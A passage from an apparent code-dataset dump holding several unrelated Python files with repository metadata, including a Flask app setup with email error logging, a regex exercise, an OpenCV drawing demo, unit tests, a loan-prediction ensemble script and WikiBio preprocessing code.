mixer' }, { 'variables': { 'sample_prep': 'microwave', 'sample_type': 'DNA', 'sequencer': 'iPhone' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'iPhone: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'microwave', 'sequencer': 'Android', 'sample_type': 'RNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: RNA prepared with microwave' }, { 'variables': { 'sample_prep': 'microwave', 'sample_type': 'DNA', 'sequencer': 'Bang & Olufsen' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Bang & Olufsen: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'mixer', 'sequencer': 'Android', 'sample_type': 'RNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: RNA prepared with mixer' }] }
153
36
49
6ce3cc168aa038a313b9bba66d4ce994e8318fc9
2,306
py
Python
app/__init__.py
x14119641/tracker
bd16897848c23c461d5d4b7a353eedd8f17367a6
[ "MIT" ]
null
null
null
app/__init__.py
x14119641/tracker
bd16897848c23c461d5d4b7a353eedd8f17367a6
[ "MIT" ]
null
null
null
app/__init__.py
x14119641/tracker
bd16897848c23c461d5d4b7a353eedd8f17367a6
[ "MIT" ]
null
null
null
from flask import Flask from config import Config from flask_sqlalchemy import SQLAlchemy from flask_migrate import Migrate from flask_login import LoginManager from logging.handlers import SMTPHandler,RotatingFileHandler from flask_mail import Mail, Message import logging,os, smtplib from threading import Thread app = Flask(__name__) app.config.from_object(Config) db = SQLAlchemy(app) migrate = Migrate(app, db) mail = Mail(app) login = LoginManager(app) login.login_view = 'login' from app import routes, models, errors class ThreadedSMTPHandler(SMTPHandler): """ Mimic SMTPHandler from logging module but seperate the actual emission (.emit) in another thread to avoid blocking the main process """ if not app.debug: if app.config['MAIL_SERVER']: auth = None if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']: auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD']) secure = None if app.config['MAIL_USE_TLS']: secure = () mail_handler = ThreadedSMTPHandler( mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']), # fromaddr='no-reply@' + app.config['MAIL_SERVER'], fromaddr=app.config['MAIL_USERNAME'], toaddrs=app.config['ADMINS'], subject='Tracker Failure', credentials=auth, secure=() ) mail_handler.setLevel(logging.ERROR) app.logger.addHandler(mail_handler) if not os.path.exists('logs'): os.mkdir('logs') file_handler = RotatingFileHandler('logs/tracker.log', maxBytes=10240, backupCount=10) file_handler.setFormatter(logging.Formatter( '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')) file_handler.setLevel(logging.INFO) app.logger.addHandler(file_handler) app.logger.setLevel(logging.INFO) app.logger.info(f'{app.__repr__} - startup')
36.603175
183
0.666522
from flask import Flask from config import Config from flask_sqlalchemy import SQLAlchemy from flask_migrate import Migrate from flask_login import LoginManager from logging.handlers import SMTPHandler,RotatingFileHandler from flask_mail import Mail, Message import logging,os, smtplib from threading import Thread app = Flask(__name__) app.config.from_object(Config) db = SQLAlchemy(app) migrate = Migrate(app, db) mail = Mail(app) login = LoginManager(app) login.login_view = 'login' from app import routes, models, errors class ThreadedSMTPHandler(SMTPHandler): """ Mimic SMTPHandler from logging module but seperate the actual emission (.emit) in another thread to avoid blocking the main process """ def emit(self, record): #I am not sure of the best way to write the following line thread = Thread(target=super().emit, args=(record,)) #for Python2 : either modify super either : thread = Thread(target=logging.handlers.SMTPHandler.emit, args=(self, record)) thread.start() if not app.debug: if app.config['MAIL_SERVER']: auth = None if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']: auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD']) secure = None if app.config['MAIL_USE_TLS']: secure = () mail_handler = ThreadedSMTPHandler( mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']), # fromaddr='no-reply@' + app.config['MAIL_SERVER'], fromaddr=app.config['MAIL_USERNAME'], toaddrs=app.config['ADMINS'], subject='Tracker Failure', credentials=auth, secure=() ) mail_handler.setLevel(logging.ERROR) app.logger.addHandler(mail_handler) if not os.path.exists('logs'): os.mkdir('logs') file_handler = RotatingFileHandler('logs/tracker.log', maxBytes=10240, backupCount=10) file_handler.setFormatter(logging.Formatter( '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')) file_handler.setLevel(logging.INFO) app.logger.addHandler(file_handler) app.logger.setLevel(logging.INFO) app.logger.info(f'{app.__repr__} - startup')
276
0
26
10521b97d7d1e032daf03879ad3e7c6638f79485
1,526
py
Python
Python Fundamentals/Regular Expressions/More Exercises/Task02_3.py
DonikaChervenkova/SoftUni
bff579c037ec48f39ed193b34bc3502a32e90732
[ "MIT" ]
1
2022-03-16T10:23:04.000Z
2022-03-16T10:23:04.000Z
Python Fundamentals/Regular Expressions/More Exercise/Task02_02.py
IvanTodorovBG/SoftUni
7b667f6905d9f695ab1484efbb02b6715f6d569e
[ "MIT" ]
null
null
null
Python Fundamentals/Regular Expressions/More Exercise/Task02_02.py
IvanTodorovBG/SoftUni
7b667f6905d9f695ab1484efbb02b6715f6d569e
[ "MIT" ]
1
2021-12-04T12:30:57.000Z
2021-12-04T12:30:57.000Z
import re data = input() total_income = 0 while data != "end of shift": pattern_customer = r"\%(?P<customer>[A-Z][a-z]+)\%" customer = re.finditer(pattern_customer, data) is_customer = bool([c.group(0) for c in customer]) pattern_product = r"\<(?P<product>[0-9a-zA-Z\_]+)\>" product = re.finditer(pattern_product, data) is_product = bool([p.group(0) for p in product]) pattern_count = r"\|(?P<count>[0-9]+)\|" count = re.finditer(pattern_count, data) is_count = bool([cnt.group(0) for cnt in count]) pattern_price = r"(?P<price>[0-9]+\.?[0-9]+)\$" price = re.finditer(pattern_price, data) is_price = bool([pr.group(0) for pr in price]) if is_customer and is_product and is_count and is_price: customer_dict = {} for c in re.finditer(pattern_customer, data): customer_dict = c.groupdict() product_dict = {} for p in re.finditer(pattern_product, data): product_dict = p.groupdict() count_dict = {} for cnt in re.finditer(pattern_count, data): count_dict = cnt.groupdict() price_dict = {} for pr in re.finditer(pattern_price, data): price_dict = pr.groupdict() total_product_price = int(count_dict['count']) * float(price_dict['price']) total_income += total_product_price print(f"{customer_dict['customer']}: {product_dict['product']} - {total_product_price:.2f}") data = input() print(f"Total income: {total_income:.2f}")
31.791667
100
0.619921
import re data = input() total_income = 0 while data != "end of shift": pattern_customer = r"\%(?P<customer>[A-Z][a-z]+)\%" customer = re.finditer(pattern_customer, data) is_customer = bool([c.group(0) for c in customer]) pattern_product = r"\<(?P<product>[0-9a-zA-Z\_]+)\>" product = re.finditer(pattern_product, data) is_product = bool([p.group(0) for p in product]) pattern_count = r"\|(?P<count>[0-9]+)\|" count = re.finditer(pattern_count, data) is_count = bool([cnt.group(0) for cnt in count]) pattern_price = r"(?P<price>[0-9]+\.?[0-9]+)\$" price = re.finditer(pattern_price, data) is_price = bool([pr.group(0) for pr in price]) if is_customer and is_product and is_count and is_price: customer_dict = {} for c in re.finditer(pattern_customer, data): customer_dict = c.groupdict() product_dict = {} for p in re.finditer(pattern_product, data): product_dict = p.groupdict() count_dict = {} for cnt in re.finditer(pattern_count, data): count_dict = cnt.groupdict() price_dict = {} for pr in re.finditer(pattern_price, data): price_dict = pr.groupdict() total_product_price = int(count_dict['count']) * float(price_dict['price']) total_income += total_product_price print(f"{customer_dict['customer']}: {product_dict['product']} - {total_product_price:.2f}") data = input() print(f"Total income: {total_income:.2f}")
0
0
0
3655fbbcf0aa34a78e5e06dada0505806b450706
789
py
Python
drawShapes.py
Shubhra1906/OpenCV
dc2b3291562bab54506380c52ac74ecb06adb8d3
[ "MIT" ]
null
null
null
drawShapes.py
Shubhra1906/OpenCV
dc2b3291562bab54506380c52ac74ecb06adb8d3
[ "MIT" ]
null
null
null
drawShapes.py
Shubhra1906/OpenCV
dc2b3291562bab54506380c52ac74ecb06adb8d3
[ "MIT" ]
null
null
null
import cv2 as cv import numpy as np from matplotlib import pyplot as plt if __name__ == '__main__': drawShapes()
27.206897
71
0.567807
import cv2 as cv import numpy as np from matplotlib import pyplot as plt def drawShapes(): image = cv.imread('./img/sea.jpg') # img = np.zeros([600, 800, 3], np.uint8) # line image = cv.line(image, (40, 100), (255, 255), (0, 0, 255), 5) # Arrowed Line image = cv.arrowedLine(image, (0, 255), (500, 350), (0, 0, 255), 5) # Rectangle image = cv.rectangle(image, (400, 250), (750, 400), (0, 0, 255), 5) # Circle image = cv.circle(image, (550, 350), 150, (0, 0, 255), 5) # Text font = cv.FONT_HERSHEY_COMPLEX image = cv.putText(image, "OpenCV", (10, 500), font, 4, (0, 255, 0), 10, cv.LINE_AA) cv.imshow('Shapes', image) cv.waitKey() cv.destroyAllWindows() if __name__ == '__main__': drawShapes()
646
0
23
57b3acfb96da7afb637bdd2beedbb9da791d379a
3,352
py
Python
tests/test_util.py
willkg/francis
c727fa5eaa77662277f95fbf000f7afc71cbbed4
[ "MIT" ]
2
2018-07-26T07:18:54.000Z
2018-09-06T16:47:18.000Z
tests/test_util.py
willkg/francis
c727fa5eaa77662277f95fbf000f7afc71cbbed4
[ "MIT" ]
6
2016-07-22T15:09:18.000Z
2016-07-22T23:25:39.000Z
tests/test_util.py
willkg/francis
c727fa5eaa77662277f95fbf000f7afc71cbbed4
[ "MIT" ]
null
null
null
import datetime import pytest from francis.util import ( parse_date, parse_rc, prettytable, ) # FIXME: test multiple > 40 columns
29.928571
83
0.488962
import datetime import pytest from francis.util import ( parse_date, parse_rc, prettytable, ) class Test_parse_rc: def test_empty(self): assert parse_rc('') == {} def test_key_val(self): assert parse_rc('foo=bar') == {'foo': 'bar'} assert parse_rc('\n foo = bar ') == {'foo': 'bar'} def test_uppercase_key(self): assert parse_rc('FOO=bar') == {'foo': 'bar'} def test_multiple(self): assert parse_rc('foo=bar\nbaz=bat') == {'foo': 'bar', 'baz': 'bat'} def test_comments(self): assert parse_rc('# foo=bar') == {} assert parse_rc(' # foo=bar') == {} class Test_prettytable: def test_empty(self): assert prettytable(0, []) == '' assert prettytable(100, []) == '' def test_single_row(self): assert ( prettytable(100, [('a', 'b', 'c', 'd')]) == ( 'a b c d\n' '--- --- --- ---' ) ) def test_truncation(self): # Total width is under 50, so no changes get made assert ( prettytable(50, [ ('1', ('a' * 39) + 'b') ]) == '1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab\n' '--- ------------------------------------------' ) # Total width is > 50, so all the c are truncated assert ( prettytable(50, [ ('1', ('a' * 41) + 'b' + 'cccccc') ]) == '1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab*\n' '--- ---------------------------------------------' ) def test_numbers(self): # Total width is > 50, so all the c are truncated assert ( prettytable(50, [ (1, ('a' * 41) + 'b' + 'cccccc') ]) == '1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab*\n' '--- ---------------------------------------------' ) # FIXME: test multiple > 40 columns class Test_parse_date: @pytest.mark.parametrize('text', [ '2015-05-05', '2016-01-01' ]) def test_datestamps(self, text): assert parse_date(text).strftime('%Y-%m-%d') == text @pytest.mark.parametrize('text,expected', [ ('today', '2016-01-01'), ('tod', '2016-01-01'), ('tomorrow', '2016-01-02'), ('tom', '2016-01-02'), ]) def test_today_tomorrow(self, text, expected): # This grounds relative dates to January 1st which was a Friday start = datetime.datetime(2016, 1, 1, 0, 0, 0) assert parse_date(text, relative_to=start).strftime('%Y-%m-%d') == expected @pytest.mark.parametrize('text,expected', [ ('friday', '2016-01-01'), ('saturday', '2016-01-02'), ('sunday', '2016-01-03'), ('monday', '2016-01-04'), ('tuesday', '2016-01-05'), ('wednesday', '2016-01-06'), ('thursday', '2016-01-07'), ]) def test_day_of_week(self, text, expected): # This grounds relative dates to January 1st which was a Friday start = datetime.datetime(2016, 1, 1, 0, 0, 0) assert parse_date(text, relative_to=start).strftime('%Y-%m-%d') == expected def test_value_error(self): with pytest.raises(ValueError): parse_date('2016-06-40')
2,205
685
310
cd5c17b028d7e8b3a56676c62432707a97d11c80
247
py
Python
ML/newton.py
siriusctrl/UniPublic
9df7f8bb9d1209de2af8ac4b5f57ada38587ad50
[ "Apache-2.0" ]
8
2021-03-14T14:19:10.000Z
2021-07-13T12:35:26.000Z
ML/newton.py
Sirius-ctrl/UniPublic
9df7f8bb9d1209de2af8ac4b5f57ada38587ad50
[ "Apache-2.0" ]
2
2018-05-29T04:28:20.000Z
2018-06-09T04:55:19.000Z
ML/newton.py
Sirius-ctrl/UniPublic
9df7f8bb9d1209de2af8ac4b5f57ada38587ad50
[ "Apache-2.0" ]
4
2019-01-10T10:30:33.000Z
2019-05-30T09:33:20.000Z
import math
16.466667
43
0.493927
import math def newton(n, e): theta = n/2 error = 99999 count = 0 while(error > e): theta -= (theta**2 - n) / (2*theta) error = theta**2 - n count += 1 print("guess", count, "times") return theta
212
0
23
7eedddac8d7d9c1d55b9ac6e1b3b84147bbbd112
28
py
Python
storedisagg/example/__init__.py
mcsoini/storedisagg
3fa360234995cdee897122ea8d85bc8658229053
[ "MIT" ]
null
null
null
storedisagg/example/__init__.py
mcsoini/storedisagg
3fa360234995cdee897122ea8d85bc8658229053
[ "MIT" ]
null
null
null
storedisagg/example/__init__.py
mcsoini/storedisagg
3fa360234995cdee897122ea8d85bc8658229053
[ "MIT" ]
null
null
null
__all__ = ['example_data']
9.333333
26
0.678571
__all__ = ['example_data']
0
0
0
a39283f2f128ca0dec249a7d9063c5194c19d4e4
3,090
py
Python
loanPrediction3/src_old/ensemble.py
MayukhSobo/AnalyticsVidya_Contests
a21079f8d217a35e88e72e88233c7ef0b8dd348b
[ "BSD-3-Clause" ]
11
2017-09-22T08:12:04.000Z
2021-10-30T14:30:44.000Z
loanPrediction3/src_old/ensemble.py
Manish041997/AnalyticsVidya_Contests
a21079f8d217a35e88e72e88233c7ef0b8dd348b
[ "BSD-3-Clause" ]
null
null
null
loanPrediction3/src_old/ensemble.py
Manish041997/AnalyticsVidya_Contests
a21079f8d217a35e88e72e88233c7ef0b8dd348b
[ "BSD-3-Clause" ]
5
2017-10-03T12:09:11.000Z
2019-08-03T14:05:47.000Z
from xgboost.sklearn import XGBClassifier # from xgb_model import xgb_model_fit # from sklearn.grid_search import GridSearchCV from sklearn.ensemble import VotingClassifier from sklearn.metrics import accuracy_score import pandas as pd from sklearn.model_selection import train_test_split import numpy as np from sklearn.ensemble import AdaBoostClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier print('\n\n') dtrain = pd.read_csv('../data/cleaned_train_v2.csv').iloc[:, 1:] dtest = pd.read_csv('../data/cleaned_test_v2.csv').iloc[:, 1:] # print(dtrain) loan_ids = dtest.Loan_ID dtest = dtest.iloc[:, 1:] features = np.array(dtrain.iloc[:, 0:-1]) labels = np.array(dtrain.Loan_Status) test = np.array(dtest) # print(features.shape) # Classifier 1 - XGBoost clf1 = XGBClassifier(learning_rate=0.1, n_estimators=1000, max_depth=3, min_child_weight=1, gamma=0.2, subsample=0.8, colsample_bytree=0.8, objective='binary:logistic', nthread=4, scale_pos_weight=1, reg_alpha=69, seed=42) # Classifier 2 - Random Forest clf2 = RandomForestClassifier(bootstrap=True, criterion='gini', max_depth=3, oob_score=True, max_features=3, min_samples_leaf=10, min_samples_split=10, random_state=42, n_jobs=-1) # X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.40, random_state=42) tree = DecisionTreeClassifier(criterion='gini', max_depth=3) clf3 = AdaBoostClassifier(base_estimator=tree, n_estimators=3000, learning_rate=0.03, random_state=42) eclf = VotingClassifier(estimators=[ ('forest', clf2), ('xgboost', clf1), ('adaboost', clf3)], voting='hard') eclf.fit(features, labels) pred = eclf.predict(test) # print(accuracy_score(y_test, pred)) # print("Random Forest Classifier.....") # clf2.fit(X_train, y_train) # pred1 = clf2.predict(X_test) # print(accuracy_score(y_test, pred1)) # print('\nXGBoost Classifier......') # clf1.fit(X_train, y_train) # pred2 = clf1.predict(X_test) # print(accuracy_score(y_test, pred2)) # clf1.fit(features, labels, eval_metric='error') # pred = clf1.predict(test) # print(pred) submission = pd.DataFrame({'Loan_ID': loan_ids, 'Loan_Status': pred}) submission['Loan_Status'] = submission.Loan_Status.map({0: 'N', 1: 'Y'}) submission.to_csv('submission2.csv', index=False) # xgb_model_fit(clf1, features, labels, folds=3) # Classifier 2 - Random Forest # Tuning ```max_depth``` and ```min_child_weight``` # param_dist = { # "max_depth": list(range(1, 8, 2)), # "max_features": list(range(1, 10, 2)), # "min_samples_split": list(range(2, 11, 2)), # "min_samples_leaf": list(range(2, 11, 2)), # "bootstrap": [True, False], # "criterion": ["gini", "entropy"] # } # gs1 = GridSearchCV(estimator=clf2, # param_grid=param_dist, # scoring='accuracy', # n_jobs=-1, # iid=False, # cv=7, # verbose=5) # gs1.fit(features, labels) # # bootstrap=True, criterion=gini, max_depth=3, max_features=3, min_samples_leaf=10, min_samples_split=10, score=0.870588 # # # print(gs1.grid_scores_) # print(gs1.best_params_) # print(gs1.best_score_)
27.589286
122
0.733333
from xgboost.sklearn import XGBClassifier # from xgb_model import xgb_model_fit # from sklearn.grid_search import GridSearchCV from sklearn.ensemble import VotingClassifier from sklearn.metrics import accuracy_score import pandas as pd from sklearn.model_selection import train_test_split import numpy as np from sklearn.ensemble import AdaBoostClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier print('\n\n') dtrain = pd.read_csv('../data/cleaned_train_v2.csv').iloc[:, 1:] dtest = pd.read_csv('../data/cleaned_test_v2.csv').iloc[:, 1:] # print(dtrain) loan_ids = dtest.Loan_ID dtest = dtest.iloc[:, 1:] features = np.array(dtrain.iloc[:, 0:-1]) labels = np.array(dtrain.Loan_Status) test = np.array(dtest) # print(features.shape) # Classifier 1 - XGBoost clf1 = XGBClassifier(learning_rate=0.1, n_estimators=1000, max_depth=3, min_child_weight=1, gamma=0.2, subsample=0.8, colsample_bytree=0.8, objective='binary:logistic', nthread=4, scale_pos_weight=1, reg_alpha=69, seed=42) # Classifier 2 - Random Forest clf2 = RandomForestClassifier(bootstrap=True, criterion='gini', max_depth=3, oob_score=True, max_features=3, min_samples_leaf=10, min_samples_split=10, random_state=42, n_jobs=-1) # X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.40, random_state=42) tree = DecisionTreeClassifier(criterion='gini', max_depth=3) clf3 = AdaBoostClassifier(base_estimator=tree, n_estimators=3000, learning_rate=0.03, random_state=42) eclf = VotingClassifier(estimators=[ ('forest', clf2), ('xgboost', clf1), ('adaboost', clf3)], voting='hard') eclf.fit(features, labels) pred = eclf.predict(test) # print(accuracy_score(y_test, pred)) # print("Random Forest Classifier.....") # clf2.fit(X_train, y_train) # pred1 = clf2.predict(X_test) # print(accuracy_score(y_test, pred1)) # print('\nXGBoost Classifier......') # clf1.fit(X_train, y_train) # pred2 = clf1.predict(X_test) # print(accuracy_score(y_test, pred2)) # clf1.fit(features, labels, eval_metric='error') # pred = clf1.predict(test) # print(pred) submission = pd.DataFrame({'Loan_ID': loan_ids, 'Loan_Status': pred}) submission['Loan_Status'] = submission.Loan_Status.map({0: 'N', 1: 'Y'}) submission.to_csv('submission2.csv', index=False) # xgb_model_fit(clf1, features, labels, folds=3) # Classifier 2 - Random Forest # Tuning ```max_depth``` and ```min_child_weight``` # param_dist = { # "max_depth": list(range(1, 8, 2)), # "max_features": list(range(1, 10, 2)), # "min_samples_split": list(range(2, 11, 2)), # "min_samples_leaf": list(range(2, 11, 2)), # "bootstrap": [True, False], # "criterion": ["gini", "entropy"] # } # gs1 = GridSearchCV(estimator=clf2, # param_grid=param_dist, # scoring='accuracy', # n_jobs=-1, # iid=False, # cv=7, # verbose=5) # gs1.fit(features, labels) # # bootstrap=True, criterion=gini, max_depth=3, max_features=3, min_samples_leaf=10, min_samples_split=10, score=0.870588 # # # print(gs1.grid_scores_) # print(gs1.best_params_) # print(gs1.best_score_)
0
0
0
442885ee6cfa521582e9f66dbef3c77656fe3fce
11,656
py
Python
data/format_wikibio.py
KaijuML/dtt-multi-branch
a49850a95034e58d387b9d48c647cfc2b83c45b5
[ "Apache-2.0" ]
8
2021-02-25T08:19:55.000Z
2022-03-12T06:25:36.000Z
data/format_wikibio.py
KaijuML/dtt-multi-branch
a49850a95034e58d387b9d48c647cfc2b83c45b5
[ "Apache-2.0" ]
5
2021-05-20T19:11:58.000Z
2021-07-14T07:46:33.000Z
data/format_wikibio.py
KaijuML/dtt-multi-branch
a49850a95034e58d387b9d48c647cfc2b83c45b5
[ "Apache-2.0" ]
null
null
null
from utils import nwise import pkg_resources import re, time, os import itertools import argparse import numpy import json DELIM = u"│" # delim used by onmt def split_infobox(dataset_folder, destination_folder): """ extract box content, field type and position information from infoboxes from original_data *.box.val is the box content (token) *.box.lab is the field type for each token *.box.pos is the position counted from the begining of a field """ bwfile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.val") for setname in ['train', 'valid', 'test']] bffile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.lab") for setname in ['train', 'valid', 'test']] bpfile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.pos") for setname in ['train', 'valid', 'test']] mixb_word, mixb_label, mixb_pos = [], [], [] for setname in ['train', 'valid', 'test']: fboxes = os.path.join(dataset_folder, 'raw', setname, f"{setname}.box") with open(fboxes, mode="r", encoding="utf8") as f: box = [line.strip() for line in f if line.strip()] box_word, box_label, box_pos = [], [], [] for ib in box: item = ib.split('\t') box_single_word, box_single_label, box_single_pos = [], [], [] for it in item: if len(it.split(':')) > 2: continue # print it prefix, word = it.split(':') if '<none>' in word or word.strip() == '' or prefix.strip() == '': continue new_label = re.sub("_[1-9]\d*$", "", prefix) if new_label.strip() == "": continue box_single_word.append(word) box_single_label.append(new_label) if re.search("_[1-9]\d*$", prefix): field_id = int(prefix.split('_')[-1]) box_single_pos.append(field_id if field_id <= 30 else 30) else: box_single_pos.append(1) box_word.append(box_single_word) box_label.append(box_single_label) box_pos.append(box_single_pos) mixb_word.append(box_word) mixb_label.append(box_label) mixb_pos.append(box_pos) print(f'{setname} done') for k, m in enumerate(mixb_word): with open(bwfile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') for k, m in enumerate(mixb_label): with open(bffile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') for k, m in enumerate(mixb_pos): with open(bpfile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') def create_tables(folder): """Here we create the tables.jl files used in PARENT metric We could optimize the code so that step is done in create_input but it's easier and more convienient to just add it there. """ for setname in ['train', 'valid', 'test']: input_filename = os.path.join(folder, 'full', f"{setname}_input.txt") with open(input_filename, mode="r", encoding="utf8") as f: # each line is a table. Each token is a value in the table. # We take the value/label of the token and discard the pos # given that they are written in the right order allvals = list() alllabs = list() for line in f: vals = list() labs = list() for token in line.strip().split(): val, lab, _, __ = token.split(DELIM) vals.append(val) labs.append(lab) allvals.append(vals) alllabs.append(labs) tables = list() for idx, (vals, labs) in enumerate(zip(allvals, alllabs)): table = list() for key, group in itertools.groupby(labs): size = len([_ for _ in group]) vvals, vals = vals[:size], vals[size:] table.append((key, vvals)) assert len(vals) == 0 # we exhausted all tokens tables.append(table) output_filename = os.path.join(folder, 'full', f"{setname}_tables.jl") with open(output_filename, mode="w", encoding="utf8") as f: for table in tables: f.write(json.dumps(table) + '\n') def preprocess(dataset_folder, destination_folder, args): """ We use a triple <f, p+, p-> to represent the field information of a token in the specific field. p+&p- are the position of the token in that field counted from the begining and the end of the field. For example, for a field (birthname, Jurgis Mikelatitis) in an infobox, we represent the field as (Jurgis, <birthname, 1, 2>) & (Mikelatitis, <birthname, 2, 1>) """ print("extracting token, field type and position info from original data ...") time_start = time.time() split_infobox(dataset_folder, destination_folder) reverse_pos(destination_folder) duration = time.time() - time_start print(f"extract finished in {duration:.3f} seconds") print("merging everything into single input file ...") time_start = time.time() create_input(destination_folder) duration = time.time() - time_start print(f"merge finished in {duration:.3f} seconds") print("extracting first sentences from original data ...") time_start = time.time() extract_sentences(dataset_folder, destination_folder, args.first_sentence) duration = time.time() - time_start print(f"extract finished in {duration:.3f} seconds") print("formatting input in human readable format ...") time_start = time.time() create_tables(destination_folder) duration = time.time() - time_start print(f"formatting finished in {duration:.3f} seconds") if __name__ == '__main__': dataset_folder = pkg_resources.resource_filename(__name__, 'wikibio') parser = argparse.ArgumentParser() group = parser.add_argument_group('Destination path') group.add_argument('--dest', '-d', dest='dest', default=dataset_folder, help='Folder where to store the resulting files') parser.add_argument('--first_sentence', action='store_true', help="Activate to keep only the first sentence") main(parser.parse_args())
41.187279
105
0.573267
from utils import nwise import pkg_resources import re, time, os import itertools import argparse import numpy import json DELIM = u"│" # delim used by onmt def split_infobox(dataset_folder, destination_folder): """ extract box content, field type and position information from infoboxes from original_data *.box.val is the box content (token) *.box.lab is the field type for each token *.box.pos is the position counted from the begining of a field """ bwfile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.val") for setname in ['train', 'valid', 'test']] bffile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.lab") for setname in ['train', 'valid', 'test']] bpfile = [os.path.join(destination_folder, 'processed_data', setname, f"{setname}.box.pos") for setname in ['train', 'valid', 'test']] mixb_word, mixb_label, mixb_pos = [], [], [] for setname in ['train', 'valid', 'test']: fboxes = os.path.join(dataset_folder, 'raw', setname, f"{setname}.box") with open(fboxes, mode="r", encoding="utf8") as f: box = [line.strip() for line in f if line.strip()] box_word, box_label, box_pos = [], [], [] for ib in box: item = ib.split('\t') box_single_word, box_single_label, box_single_pos = [], [], [] for it in item: if len(it.split(':')) > 2: continue # print it prefix, word = it.split(':') if '<none>' in word or word.strip() == '' or prefix.strip() == '': continue new_label = re.sub("_[1-9]\d*$", "", prefix) if new_label.strip() == "": continue box_single_word.append(word) box_single_label.append(new_label) if re.search("_[1-9]\d*$", prefix): field_id = int(prefix.split('_')[-1]) box_single_pos.append(field_id if field_id <= 30 else 30) else: box_single_pos.append(1) box_word.append(box_single_word) box_label.append(box_single_label) box_pos.append(box_single_pos) mixb_word.append(box_word) mixb_label.append(box_label) mixb_pos.append(box_pos) print(f'{setname} done') for k, m in enumerate(mixb_word): with open(bwfile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') for k, m in enumerate(mixb_label): with open(bffile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') for k, m in enumerate(mixb_pos): with open(bpfile[k], "w+") as h: for items in m: for sens in items: h.write(str(sens) + " ") h.write('\n') def reverse_pos(folder): # get the position counted from the end of a field bpfile = [os.path.join(folder, 'processed_data', setname, f"{setname}.box.pos") for setname in ['train', 'valid', 'test']] bwfile = [os.path.join(folder, 'processed_data', setname, f"{setname}.box.rpos") for setname in ['train', 'valid', 'test']] for k, pos in enumerate(bpfile): box = open(pos, "r").read().strip().split('\n') reverse_pos = [] for bb in box: pos = bb.split() tmp_pos = [] single_pos = [] for p in pos: if int(p) == 1 and len(tmp_pos) != 0: single_pos.extend(tmp_pos[::-1]) tmp_pos = [] tmp_pos.append(p) single_pos.extend(tmp_pos[::-1]) reverse_pos.append(single_pos) with open(bwfile[k], 'w+') as bw: for item in reverse_pos: bw.write(" ".join(item) + '\n') def create_input(folder): for setname in ["train", "valid", "test"]: valfilename = os.path.join(folder, 'processed_data', setname, f"{setname}.box.val") labfilename = os.path.join(folder, 'processed_data', setname, f"{setname}.box.lab") posfilename = os.path.join(folder, 'processed_data', setname, f"{setname}.box.pos") rposfilename = os.path.join(folder, 'processed_data', setname, f"{setname}.box.rpos") with open(valfilename, mode='r', encoding='utf8') as valfile: vals = [line.strip() for line in valfile if line.strip()] with open(labfilename, mode='r', encoding='utf8') as labfile: labs = [line.strip() for line in labfile if line.strip()] with open(posfilename, mode='r', encoding='utf8') as posfile: poss = [line.strip() for line in posfile if line.strip()] with open(rposfilename, mode='r', encoding='utf8') as rposfile: rposs = [line.strip() for line in rposfile if line.strip()] assert len(vals) == len(labs) == len(poss) == len(rposs) input = list() for idx, (val, lab, pos, rpos) in enumerate(zip(vals, labs, poss, rposs)): vval = val.strip().split(' ') llab = lab.strip().split(' ') ppos = pos.strip().split(' ') rrpos = rpos.strip().split(' ') if not len(vval) == len(llab) == len(ppos) == len(rrpos): print(f"error at step {idx}:", len(vval), len(llab), len(ppos), len(rrpos)) raise RuntimeError input.append( ' '.join([re.sub('\s', '~', DELIM.join(tup)) for tup in zip(vval, llab, ppos, rrpos)]) ) input_filename = os.path.join(folder, 'full', f"{setname}_input.txt") with open(input_filename, mode="w", encoding="utf8") as f: for i in input: f.write(i + "\n") print(f'{setname} done.') def extract_sentences(dataset_folder, destination_folder, only_first=True): for setname in ['train', 'valid', 'test']: inputnb_filename = os.path.join(dataset_folder, 'raw', setname, f"{setname}.nb") inputsent_filename = os.path.join(dataset_folder, 'raw', setname, f"{setname}.sent") output_filename = os.path.join(destination_folder, 'full', f"{setname}_output.txt") nb = [0] with open(inputnb_filename, encoding='utf8', mode='r') as f: # Here we get the indices of the first sentence for each instance # The file .sent contains one sentence per line but instances have # more than one sentence each. (number is variable) for idx, line in enumerate(f): nb += [int(line.strip())] indices = numpy.cumsum(nb[:-1]) sentences = list() with open(inputsent_filename, encoding='utf8', mode='r') as f: for idx, line in enumerate(f): sentences += [line.strip()] if only_first: with open(output_filename, mode='w', encoding='utf8') as f: for idx in indices: f.write(sentences[idx] + '\n') else: 